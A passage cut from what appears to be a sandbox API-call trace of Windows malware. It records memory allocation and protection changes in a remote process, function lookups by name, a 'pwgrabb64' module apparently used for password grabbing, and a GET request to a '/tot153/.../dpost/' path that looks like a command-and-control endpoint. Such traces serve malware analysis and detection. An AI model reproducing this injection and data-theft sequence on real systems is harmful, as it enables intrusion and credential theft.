lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.794] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.794] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c3f0 | out: hHeap=0x2150000) returned 1 [0176.794] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.796] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.796] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.796] lstrlenA (lpString="CompareStringW") returned 14 [0176.796] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.797] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.797] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c720 [0176.797] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.798] ResetEvent (hEvent=0x580) returned 1 [0176.798] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.798] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.798] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.798] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c720 | out: hHeap=0x2150000) returned 1 [0176.798] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.800] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.800] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.800] lstrlenA (lpString="LCMapStringW") returned 12 [0176.800] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.801] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.801] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cb70 [0176.801] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.801] ResetEvent (hEvent=0x580) returned 1 [0176.801] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.802] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.802] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.802] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cb70 | out: hHeap=0x2150000) returned 1 [0176.802] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.803] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.803] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.803] lstrlenA (lpString="GetTimeZoneInformation") returned 22 [0176.803] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x17, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.804] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.804] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c660 [0176.804] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.804] ResetEvent (hEvent=0x580) returned 1 [0176.804] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.805] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.805] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.805] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c660 | out: hHeap=0x2150000) returned 1 [0176.805] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.806] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.806] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.806] lstrlenA (lpString="FindClose") returned 9 [0176.806] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.807] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.807] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c9c0 [0176.807] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.807] ResetEvent (hEvent=0x580) returned 1 [0176.807] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.808] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.808] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.808] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c9c0 | out: hHeap=0x2150000) returned 1 [0176.808] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.810] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.810] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.810] lstrlenA (lpString="FindFirstFileExA") returned 16 [0176.810] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.810] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.811] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cde0 [0176.811] ResetEvent (hEvent=0x580) returned 1 [0176.811] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.812] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.812] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.812] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cde0 | out: hHeap=0x2150000) returned 1 [0176.812] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.813] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.813] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.813] lstrlenA (lpString="FindNextFileA") returned 13 [0176.813] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cb40 [0176.814] ResetEvent (hEvent=0x580) returned 1 [0176.814] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.814] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cb40 | out: hHeap=0x2150000) returned 1 [0176.814] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.815] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.815] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.815] lstrlenA (lpString="IsValidCodePage") returned 15 [0176.815] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cde0 [0176.816] ResetEvent (hEvent=0x580) returned 1 [0176.816] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.816] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cde0 | out: hHeap=0x2150000) returned 1 [0176.816] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.816] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.817] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.817] lstrlenA (lpString="GetOEMCP") returned 8 [0176.817] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cb40 [0176.817] ResetEvent (hEvent=0x580) returned 1 [0176.817] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.818] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cb40 | out: hHeap=0x2150000) returned 1 [0176.818] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.818] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.818] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.818] lstrlenA (lpString="GetCPInfo") returned 9 [0176.819] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c510 [0176.819] ResetEvent (hEvent=0x580) returned 1 [0176.819] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.820] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c510 | out: hHeap=0x2150000) returned 1 [0176.820] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.820] lstrlenA (lpString="GetCommandLineA") returned 15 [0176.820] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c510 [0176.821] ResetEvent (hEvent=0x580) returned 1 [0176.821] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.821] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c510 | out: hHeap=0x2150000) returned 1 [0176.821] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.821] lstrlenA (lpString="GetCommandLineW") returned 15 [0176.822] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cde0 [0176.822] ResetEvent (hEvent=0x580) returned 1 [0176.822] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.823] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cde0 | out: hHeap=0x2150000) returned 1 [0176.823] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.823] lstrlenA (lpString="GetEnvironmentStringsW") returned 22 [0176.824] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c870 [0176.825] ResetEvent (hEvent=0x580) returned 1 [0176.825] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.825] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c870 | out: hHeap=0x2150000) returned 1 [0176.825] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.825] lstrlenA (lpString="FreeEnvironmentStringsW") returned 23 [0176.826] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c870 [0176.826] ResetEvent (hEvent=0x580) returned 1 [0176.826] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.827] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c870 | out: hHeap=0x2150000) returned 1 [0176.827] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.827] lstrlenA (lpString="SetEnvironmentVariableA") returned 23 [0176.827] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cde0 [0176.828] ResetEvent (hEvent=0x580) returned 1 [0176.828] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.828] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cde0 | out: hHeap=0x2150000) returned 1 [0176.830] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x97200) returned 0x32549720 [0176.871] VirtualProtectEx (in: hProcess=0x5cc, lpAddress=0x180001000, dwSize=0x97014, flNewProtect=0x20, lpflOldProtect=0xcdb94 | out: lpflOldProtect=0xcdb94*=0x4) returned 1 [0176.883] VirtualProtectEx (in: hProcess=0x5cc, lpAddress=0x180099000, dwSize=0x1a76a, flNewProtect=0x2, lpflOldProtect=0xcdb94 | out: lpflOldProtect=0xcdb94*=0x4) returned 1 [0176.884] VirtualProtectEx (in: hProcess=0x5cc, lpAddress=0x1800b4000, dwSize=0x47b4, flNewProtect=0x4, lpflOldProtect=0xcdb94 | out: lpflOldProtect=0xcdb94*=0x4) returned 1 [0176.884] VirtualProtectEx (in: hProcess=0x5cc, lpAddress=0x1800b9000, dwSize=0x6888, flNewProtect=0x2, lpflOldProtect=0xcdb94 | out: lpflOldProtect=0xcdb94*=0x4) returned 1 [0176.884] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e412d0 [0176.885] ResetEvent (hEvent=0x580) returned 1 [0176.885] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0178.690] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e412d0 | out: hHeap=0x2150000) returned 1 [0178.690] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32549720 | out: hHeap=0x2150000) returned 1 [0178.704] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32648720 | out: hHeap=0x2150000) returned 1 [0178.708] lstrlenA (lpString="pwgrabb64") returned 9 [0178.710] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x50) returned 0x32e412d0 [0178.710] ResetEvent (hEvent=0x580) returned 1 [0178.710] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0178.774] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e412d0 | out: hHeap=0x2150000) returned 1 [0178.775] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6ccc0 [0178.775] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x600) returned 0x32747010 [0178.775] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e49dc0 [0178.779] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xce018 | out: lpSystemTimeAsFileTime=0xce018*(dwLowDateTime=0xf7130b74, dwHighDateTime=0x1d7b3c9)) [0178.779] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e407b0 | out: hHeap=0x2150000) returned 1 [0178.779] GetTickCount () returned 0xebfa03 [0178.779] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e407b0 [0178.779] GetTickCount () returned 0xebfa03 [0178.779] GetTickCount () returned 0xebfa03 [0178.779] GetTickCount () returned 0xebfa03 [0178.779] GetTickCount () returned 0xebfa03 [0178.779] GetTickCount () returned 0xebfa03 [0178.779] GetTickCount () returned 0xebfa03 [0178.779] GetTickCount () returned 0xebfa03 [0178.779] GetTickCount () returned 0xebfa03 [0178.779] GetTickCount () returned 0xebfa03 [0178.779] GetTickCount () returned 0xebfa03 [0178.779] GetTickCount () returned 0xebfa03 [0178.779] GetTickCount () returned 0xebfa03 [0178.779] GetTickCount () returned 0xebfa03 [0178.779] GetTickCount () returned 0xebfa03 [0178.779] GetTickCount () returned 0xebfa03 [0178.779] GetTickCount () returned 0xebfa03 [0178.779] GetTickCount () returned 0xebfa03 [0178.779] GetTickCount () returned 0xebfa03 [0178.779] GetTickCount () returned 0xebfa03 [0178.779] GetTickCount () returned 0xebfa03 [0178.779] WinHttpCloseHandle (hInternet=0x7b42c0) returned 1 [0178.780] WinHttpOpenRequest (hConnect=0x728fa0, pwszVerb="GET", pwszObjectName="/tot153/XC64ZB_W10010586.FDB33F77971735B3BB3BB3B3B33B3B93/5/dpost/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x7b42c0 [0178.780] WinHttpSetOption (hInternet=0x7b42c0, dwOption=0x1f, lpBuffer=0xcd508, dwBufferLength=0x4) returned 1 [0178.780] WinHttpSendRequest (hRequest=0x7b42c0, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1 [0179.340] WinHttpReceiveResponse (hRequest=0x7b42c0, lpReserved=0x0) returned 1 [0179.340] WinHttpQueryHeaders (in: hRequest=0x7b42c0, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0xcd504, lpdwBufferLength=0xcd50c, lpdwIndex=0x0 | out: lpBuffer=0xcd504*, lpdwBufferLength=0xcd50c*=0x4, lpdwIndex=0x0) returned 1 [0179.341] WinHttpQueryDataAvailable (in: hRequest=0x7b42c0, lpdwNumberOfBytesAvailable=0xcd5e0 | out: lpdwNumberOfBytesAvailable=0xcd5e0*=0x2b0) returned 1 [0179.341] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x2b0) returned 0x32e423d0 [0179.341] WinHttpReadData (in: hRequest=0x7b42c0, lpBuffer=0x32e423d0, dwNumberOfBytesToRead=0x2b0, lpdwNumberOfBytesRead=0xcd5e4 | out: lpBuffer=0x32e423d0*, lpdwNumberOfBytesRead=0xcd5e4*=0x2b0) returned 1 [0179.341] WinHttpQueryDataAvailable (in: hRequest=0x7b42c0, lpdwNumberOfBytesAvailable=0xcd5e0 | out: lpdwNumberOfBytesAvailable=0xcd5e0*=0x0) returned 1 [0179.341] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xce018 | out: lpSystemTimeAsFileTime=0xce018*(dwLowDateTime=0xf766c79b, dwHighDateTime=0x1d7b3c9)) [0179.341] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c360 [0179.341] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x200) returned 0x32e5c6c0 [0179.341] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c930 [0179.343] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xce028 | out: lpSystemTimeAsFileTime=0xce028*(dwLowDateTime=0xf766c79b, dwHighDateTime=0x1d7b3c9)) [0179.343] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x1000) returned 0x32e64aa0 [0179.343] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33823bd0) returned 1 [0179.344] CryptCreateHash (in: hProv=0x33823bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.344] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x20, dwFlags=0x0) returned 1 [0179.344] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.344] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cae0 [0179.344] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6cae0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6cae0, pdwDataLen=0xcdf6c) returned 1 [0179.344] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.345] CryptReleaseContext (hProv=0x33823bd0, dwFlags=0x0) returned 1 [0179.345] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338227d0) returned 1 [0179.345] CryptCreateHash (in: hProv=0x338227d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.345] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x40, dwFlags=0x0) returned 1 [0179.345] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.345] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c720 [0179.345] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6c720, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6c720, pdwDataLen=0xcdf6c) returned 1 [0179.345] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.345] CryptReleaseContext (hProv=0x338227d0, dwFlags=0x0) returned 1 [0179.345] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338228d0) returned 1 [0179.346] CryptCreateHash (in: hProv=0x338228d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.346] CryptHashData (hHash=0x332b7d60, pbData=0x32e64aa0, dwDataLen=0x60, dwFlags=0x0) returned 1 [0179.346] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.346] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c9f0 [0179.346] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x2, pbData=0x32e6c9f0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6c9f0, pdwDataLen=0xcdf6c) returned 1 [0179.346] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0179.346] CryptReleaseContext (hProv=0x338228d0, dwFlags=0x0) returned 1 [0179.346] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338239d0) returned 1 [0179.347] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.347] CryptHashData (hHash=0x332b7d60, pbData=0x32e64aa0, dwDataLen=0x80, dwFlags=0x0) returned 1 [0179.347] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.347] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c3f0 [0179.347] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x2, pbData=0x32e6c3f0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6c3f0, pdwDataLen=0xcdf6c) returned 1 [0179.347] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0179.347] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0179.347] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822dd0) returned 1 [0179.348] CryptCreateHash (in: hProv=0x33822dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.348] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0xa0, dwFlags=0x0) returned 1 [0179.348] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.348] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c660 [0179.348] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6c660, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6c660, pdwDataLen=0xcdf6c) returned 1 [0179.348] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.348] CryptReleaseContext (hProv=0x33822dd0, dwFlags=0x0) returned 1 [0179.348] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33823ad0) returned 1 [0179.349] CryptCreateHash (in: hProv=0x33823ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.349] CryptHashData (hHash=0x332b7d60, pbData=0x32e64aa0, dwDataLen=0xc0, dwFlags=0x0) returned 1 [0179.349] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.349] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cb40 [0179.349] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x2, pbData=0x32e6cb40, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6cb40, pdwDataLen=0xcdf6c) returned 1 [0179.349] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0179.349] CryptReleaseContext (hProv=0x33823ad0, 